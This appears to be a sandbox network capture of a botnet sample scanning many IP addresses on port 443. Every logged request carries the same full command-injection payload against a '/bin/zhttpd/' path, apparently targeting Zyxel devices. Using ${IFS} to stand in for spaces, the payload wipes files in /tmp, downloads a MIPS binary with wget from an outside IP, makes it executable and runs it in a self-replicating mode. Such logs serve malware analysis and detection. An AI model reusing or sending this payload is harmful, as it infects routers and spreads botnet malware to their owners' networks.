                                          Jan 14, 2024 15:46:15.983843088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4264192.168.2.234387698.135.187.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983860016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4265192.168.2.235185017.46.219.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983886957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4266192.168.2.2339526134.130.74.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983915091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4267192.168.2.235420871.83.219.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983941078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4268192.168.2.2334168180.158.112.40443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.983978987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4269192.168.2.233356037.228.193.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984009027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4270192.168.2.2349062134.168.32.205443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984047890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4271192.168.2.234623040.190.116.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984081984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4272192.168.2.235801287.192.1.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984087944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4273192.168.2.2358146191.25.57.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984121084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4274192.168.2.2339876195.50.98.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984127998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4275192.168.2.233362468.62.122.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984173059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4276192.168.2.2357372182.117.226.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984209061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4277192.168.2.234547479.43.90.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984262943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4278192.168.2.234167859.93.176.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984266043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4279192.168.2.2359452177.9.149.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984296083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4280192.168.2.233392474.227.254.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984319925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4281192.168.2.233857886.180.99.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984345913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4282192.168.2.2353020124.143.224.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984399080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4283192.168.2.234916049.87.42.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984414101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4284192.168.2.235913698.108.202.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984440088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4285192.168.2.2336956211.237.177.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984481096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4286192.168.2.2357934155.109.179.49443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984503031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4287192.168.2.233906240.47.24.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984525919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4288192.168.2.2353064124.233.12.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984534025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4289192.168.2.234560470.3.56.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984565020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4290192.168.2.233445880.125.254.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984611988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4291192.168.2.2347956104.96.6.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984632015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4292192.168.2.234578090.40.20.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984674931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4293192.168.2.2334542165.80.74.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984689951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4294192.168.2.2359308175.224.199.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984723091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4295192.168.2.2342766116.246.111.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984750032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4296192.168.2.234294275.218.236.1443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984762907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4297192.168.2.2352260101.102.170.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984797001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4298192.168.2.2333356202.231.205.206443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984832048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4299192.168.2.235340459.63.194.94443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984853983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4300192.168.2.2360978207.92.175.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984862089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4301192.168.2.235538239.181.226.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984891891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4302192.168.2.235313868.199.16.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984924078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4303192.168.2.2360838209.46.37.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984940052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4304192.168.2.2349194217.198.180.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.984996080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4305192.168.2.234876213.76.107.190443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985018015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4306192.168.2.2337598219.251.9.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985018015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4307192.168.2.2355262125.184.101.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985038042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4308192.168.2.2333826105.175.83.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985074997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4309192.168.2.2359162204.97.243.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985076904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4310192.168.2.2335236177.205.123.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985127926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4311192.168.2.2345386192.66.137.120443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985146999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4312192.168.2.2335396141.213.169.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985171080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4313192.168.2.234646819.166.141.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985210896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4314192.168.2.23544821.86.137.243443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985225916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4315192.168.2.2337242117.3.71.168443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985274076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4316192.168.2.2360382192.177.125.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985320091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4317192.168.2.2347496119.138.105.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985364914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4318192.168.2.2356312161.66.108.149443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985364914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4319192.168.2.234081890.100.134.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985400915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4320192.168.2.233544882.17.0.174443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985423088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4321192.168.2.2342892189.21.192.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985456944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4322192.168.2.235870259.182.191.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985456944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4323192.168.2.2337468158.193.128.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985507965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4324192.168.2.233732894.150.118.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985516071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4325192.168.2.2343296161.66.244.25443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:15.985543013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4326192.168.2.23569884.45.232.201443
                                          TimestampBytes transferredDirectionData
